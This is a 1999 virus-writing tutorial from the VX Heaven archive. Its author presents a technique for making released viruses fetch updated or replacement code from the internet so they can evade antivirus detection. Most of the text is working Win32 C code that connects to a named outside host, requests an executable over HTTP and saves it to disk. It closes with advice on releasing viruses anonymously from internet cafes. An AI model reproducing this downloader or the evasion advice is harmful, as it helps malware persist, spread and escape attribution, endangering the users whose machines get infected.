Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

I will survive...

Changeling
September 1999

[Back to index] [Comments]

[There're many variations to this idea and I'll leave it to your creativity to find out what hides in the shadows.]

Introduction

How would the perfect virus look like? There're many ideas, but the best idea would probably be to put a human inside a virus. This human would be able to produce new ideas and viruses etc., etc., etc.. As this can't be done, yet (ever?), I've come up with a much simpler method of making an almost perfect virus. I really mean it, an almost perfect virus! The idea is that we can update our virus after we've released it.

Let's assume we've created a virus and have succesfully spread it. All of a sudden its name appears on the wildlist and then the game is usually quickly over. Wouldn't it be nice if we now could tell all our viruses in the wild that they should quickly change shape so as to avoid detection? Is this possible? Yes, and it's almost too simple! :)

The Intelligent Virus (Author)

The new function in the virus has the job to check if we're on the Internet or some other Net. Then it would try to locate a certain address from where it would download an update to itself or simply a new virus (why give up our hard to come by places in the wild?!). Here's a really basic example in C (easy to change into assembly, have your Win32 reference and API constants reference ready):

/*Idea and program by the Changeling (Sep.99)*/
/*This program will attempt to download the file1.exe to your computer.*/
/*The file1 program will simply display a MessageBox and say it's from the Internet.*/
/*As more and more people get on the Internet this method will ensure our viruses a long*/
/*and healthy life. :) With this method you simply place new or updated versions of your*/
/*viruses on other computers in the wild. Beautiful idea, isn't it?! :) Have fun!*/
/*Don't forget to link it to wsock32.lib or similar libraries.*/
#include <winsock.h>
void main (void)
{
/*Stratup variables*/
WORD VersionRequested = MAKEWORD (1,1);
WSADATA WsaData;
int ReturnValue;
/*Network variables*/
SOCKET Socket;
LPSERVENT ServEnt;
SOCKADDR_IN Server;
char Buffy[1024];
IN_ADDR Host;
LPHOSTENT HostEntry;
LPCSTR ServerName = "eo.yifan.net";
/*Won't work without the GET command and the \n (newline)*/
LPCSTR FileName = "GET /users/u/changeling/file1.exe\n";
/*File variables*/
HANDLE hFile;
DWORD BytesReadWritten;

/*WSAStartup initiates use of the Windows Sockets DLL by a process*/
ReturnValue = WSAStartup (VersionRequested, &WsaData);
/*when returnvalue not equal to zero*/
if (ReturnValue!=0)
    {
    MessageBox (0, "Error in WSAStartup!", "ERROR",0);
    WSACleanup ();
    return;
    }
/*when wsaData.wVersion not equal to wVersionRequested*/
if (WsaData.wVersion != VersionRequested)
    {
    MessageBox (0, "Not supported winsock version!","ERROR", 0);
    WSACleanup ();
    return;
    }
/*converts a string containing an Internet Protocol dotted address into a proper address for the IN_ADDR structure*/
Host.s_addr = inet_addr (ServerName);
/*when iaHost.s_addre is equal to INADDR_NONE*/
if (Host.s_addr == INADDR_NONE)
    {
    /*It's not a IP address string so we assume it is a name (as in this example!)*/
    HostEntry = gethostbyname (ServerName);
    }
/*when iaHost.s_addre is not equal to INADDR_NONE*/
else
    {
    /*It's a IP address string*/
    HostEntry = gethostbyaddr ((const char *)&Host,sizeof (struct in_addr), AF_INET);
    }
/*There's an error with the IP address or name*/
if (HostEntry == NULL)
    {
    MessageBox (0, "Error in host name/addr!", "ERROR",0);
    return;
    }
/*function socket creates a socket that is bound to a specific service provider*/
Socket = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
/*There has been error when trying to create a socket*/
if (Socket == INVALID_SOCKET)
    {
    MessageBox (0, "Error when using socket!", "ERROR",0);
    return;
    }
/*getservbyname retrieves service information corresponding to a service name and protocol*/
ServEnt = getservbyname ("http", "tcp");
/*If there's been error we assume we can use the default port 80*/
if (ServEnt == NULL)
    Server.sin_port = htons (80);
/*Put the port value into our server address structure*/
else
    Server.sin_port = ServEnt->s_port;

/*Put the remaining values into out server address structure*/
Server.sin_family = AF_INET;
Server.sin_addr = *((LPIN_ADDR)*HostEntry->h_addr_list);

/*the socket function establishes a connection to a specifed socket*/
ReturnValue = connect (Socket, (LPSOCKADDR)&Server, sizeof
(SOCKADDR_IN));
/*If there's been an error*/
if (ReturnValue == SOCKET_ERROR)
    {
    MessageBox (0, "Error when using connect!","ERROR", 0);
    closesocket (Socket);
    return;
    }

/*the send function sends data on a connected socket*/
ReturnValue = send (Socket, FileName, strlen (FileName), 0);

if (ReturnValue == SOCKET_ERROR)
    {
    MessageBox (0, "Error when using send!", "ERROR",0);
    closesocket (Socket);
    return;
    }

/*Create an empty file and be ready to write to it*/
hFile = CreateFile ("file1.exe", GENERIC_WRITE, 0, 0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);

while (1)
    {
    /*therecv function receives data on a socket*/
    ReturnValue = recv (Socket, Buffy, sizeof (Buffy),0);
    /*There's been error*/
    if (ReturnValue == SOCKET_ERROR)
        {
        MessageBox (0, "Error when using recv!", "ERROR", 0);
        break;
        }

    /*ReturnValue is equal to zero when the server has terminated*/
    if (ReturnValue == 0)
        break;
    /*Write to our file*/
    WriteFile (hFile, (LPSTR)Buffy, ReturnValue,&BytesReadWritten, 0);
    }
/*Close the socket*/
closesocket(Socket);
/*Close the filehandle*/
CloseHandle (hFile);
/*terminates use of the Windows Sockets DLL*/
WSACleanup ();
/*That's it!*/
}

The Conclusion

I'm not saying that poeple should stop using encryption/polymorphism etc., this is just a technique to keep your virus(es) alive (as long as you want to?!) in the wild. This technique is now in it's beginning phase, but as more and more of the world gets connected it'll become more important. There're many kinds of protocols one might use, like HTTP/FTP/SMTP/POP, but I think HTTP is the easiest to deal with. F.ex, it's really easy to get some free web-space on the Internet etc.. A short hint: People don't seem to give a shit about from where they release their viruses, but they should. Never, ever, release something from your computer. So, when you want, f.ex, a free account somewhere you might use an Internet Cafe to get it, for a change.

[If you're looking for a really good C compiler, I suggest you should get lcc-win32 (freeware) at http://www.cs.virginia.edu/~lcc-win32. If you send me some positive feedback on this method I'll consider writing an improved paper with ASM code ++. It'll, if you want to, appear first in mid or late-December since I now have to do some real work. :( ]

By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxer.org aka vx.netlux.org
deenesitfrplruua